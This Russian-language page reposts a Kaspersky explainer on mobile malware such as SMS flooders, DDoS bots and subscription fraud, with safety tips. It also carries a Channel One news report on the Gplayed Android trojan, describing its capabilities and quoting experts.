По счастью, избавиться от ненужных подписок несложно: все подписки отображаются в личном кабинете на сайте оператора. Там же вы можете их отключить, и даже запретить оформлять новые на этот номер (впрочем, в некоторых случаях такой запрет можно наложить только временно). Главное — заметить утечку денег со счета достаточно быстро, чтобы у вас не украли слишком много.

SMS-флудеры и DDoS-еры

Эти две категории объединяют зловреды, которые не скачивают, а отправляют данные — много данных! И делают это, конечно же, тайком, не спрашивая вашего разрешения. На том, чтобы за ваш счет испортить кому-то жизнь, тоже можно неплохо подзаработать — этим и пользуются мошенники.

Так, SMS-флуд часто используют хулиганы, чтобы поиздеваться над своей жертвой или вывести ее аппарат из строя. Флудеры можно установить на свое устройство и с него заваливать тысячами СМС своих врагов. Но многие не ограничиваются этим и стремятся отправлять сообщения за чужой счет, незаметно подсовывая приложение посторонним.

DDoS-еры способны «уложить на лопатки» не только смартфон, но и более мощное устройство или даже крупный интернет-ресурс. Для этого злоумышленники объединяют зараженные гаджеты в сеть — ботнет — и засыпают жертву запросами с них. Кстати, в роли DDoS-ера могут выступать и кликеры, пытающиеся открыть одну и ту же веб-страницу бессчетное количество раз.

И флудеры, и DDoS-еры пытаются с помощью вашего смартфона навредить кому-то еще. И все же для вас их деятельность тоже не пройдет бесследно, ведь это нагрузка и на производительность гаджета, и на его аккумулятор, и, естественно, на ваш счет. Обычно эти программы распространяются не очень широко, однако в июле 2013 года SMS-флудер Didat попал в топ-20 вредоносных программ, рассылаемых по почте.

Чем дальше в лес…

Сегодняшние герои нашей энциклопедии мобильной нечисти не слишком опасны. В худшем случае они утянут деньги со счета вашего телефона и попортят вам нервы. При этом многих из них легко обнаружить и удалить с помощью антивируса.

В следующих главах мы расскажем о злодеях повыше рангом. Следите за обновлениями и помните о правилах мобильной безопасности:

  • Не устанавливайте приложения из сторонних источников, а лучше вообще запретите это в настройках операционной системы!
  • Своевременно обновляйте мобильную ОС и все установленные приложения.
  • Защищайте мобильным антивирусом все свои устройства на Android.
  • Регулярно проверяйте список платных услуг в личном кабинете мобильного оператора и отключайте все, на что не подписывались сами. Обнаружив незнакомую подписку, не поленитесь проверить ваше устройство антивирусом.
  • Всегда читайте списки разрешений, которые у вас просит приложение, и не позволяйте лишнего.

www.kaspersky.ru

в зоне риска — десятки миллионов смартфонов с системой «Андроид». Новости. Первый канал

На первый взгляд это просто набор символов, строчки программного кода на черном фоне. Кто бы мог подумать, что оружие будущего будет выглядеть именно так! Перед вами Gplayed — новейшая троянская программа. Она может работать как хитрый шпион, отслеживая каждый ваш шаг или обчистить банковские счета. Трояну достаточно просто попасть на смартфон.

«Примечательно в нем то, что он модульный. Нацелен не на массовых пользователей, а на конкретного человека, чтобы к нему лучше подобраться, чтобы перехватить то, что нужно, конкретное», — рассказал антивирусный эксперт «Лаборатории Касперского» Виктор Чебышев.

Троян поражает смартфоны на базе «Андроид» и маскируется под приложение Play market — немного другая иконка, другое название, но ошибиться легко. С одной стороны, программа настойчиво будет просить ввести личные данные заново, например, подтвердить номер банковской карты, с другой — она также начинает изучать владельца.

«Маленький, компактненький, он загружается, смотрит окружение, что происходит на устройстве, отслеживает ситуацию, передает данные злоумышленникам, и они ему туда нужные модули заливают. Например, модуль перехвата WhatsApp-сообщений», — пояснил Чебышев.

Выходит, пока троян установлен на телефоне, он собирается как конструктор, может меняться и разрастаться, к вам напрямую могут подключаться злоумышленники. Американские специалисты, обнаружившие Gplayed, называют его новым видом гибридной угрозы будущего.

Покажи мне свой смартфон, и я скажу, кто ты. Сегодня мы храним в этих устройствах буквально всю личную информацию. И эта троянская программа получит доступ абсолютно ко всему: ваша геолокация, ваши контакты, банковские карты. Этот троян может отправлять СМС и звонить с вашего номера или заблокировать доступ к смартфону или стереть вообще все.

Выражение «под колпаком», пожалуй, еще никогда не касалось такого количества людей. В мире больше двух миллиардов активных пользователей «Андроид».

Еще одна очень странная деталь — Gplayed на русском языке. Страницы меню, электронные формы. Как считают американские специалисты, троян, возможно, создавался для целенаправленной атаки на российских пользователей. И тут напрашивается еще один способ использования программы — политический.

«Мы видим очень крупную DDoS-атаку с тех устройств, на которые установлены трояны. Это могут быть атаки на серьезные и важные интернет-ресурсы с целью изменений информационного поля», — подчеркнул главный аналитик Российской ассоциации электронных коммуникаций Карен Казарян.

Как не собрать ингредиенты воедино и не подать под нужным соусом? Вредоносная программа с кучей русских слов атакует с русских мобильников американские компьютеры перед выборами, почту Хиллари Клинтон, немецкие газеты, штаб-квартиру ОЗХО — все это позволяет сделать Gplayed, неизвестно кем и для чего созданный. При этом специалисты по киберпреступности заявляют: попавшая к ним версия трояна всего лишь тестовая, массовый запуск программы в Сеть, видимо, еще не состоялся, и кто знает, на что будет способна полная версия.

Обезопасить пока может только внимательность. Внимательно проверяйте приложения и сайты, их иконки и дизайн, как они себя ведут и чего требует, и ни в коем случае не переходите по неизвестным ссылкам, даже если их прислали со знакомого номера или адреса.

www.1tv.ru

Разное

Отправить ответ

avatar
  Подписаться  
Уведомление о
©2020 Все права защищены.
Разрешено любое использование текстовых материалов сайта, с указание авторства и активной ссылки на сайт gnucash.ru.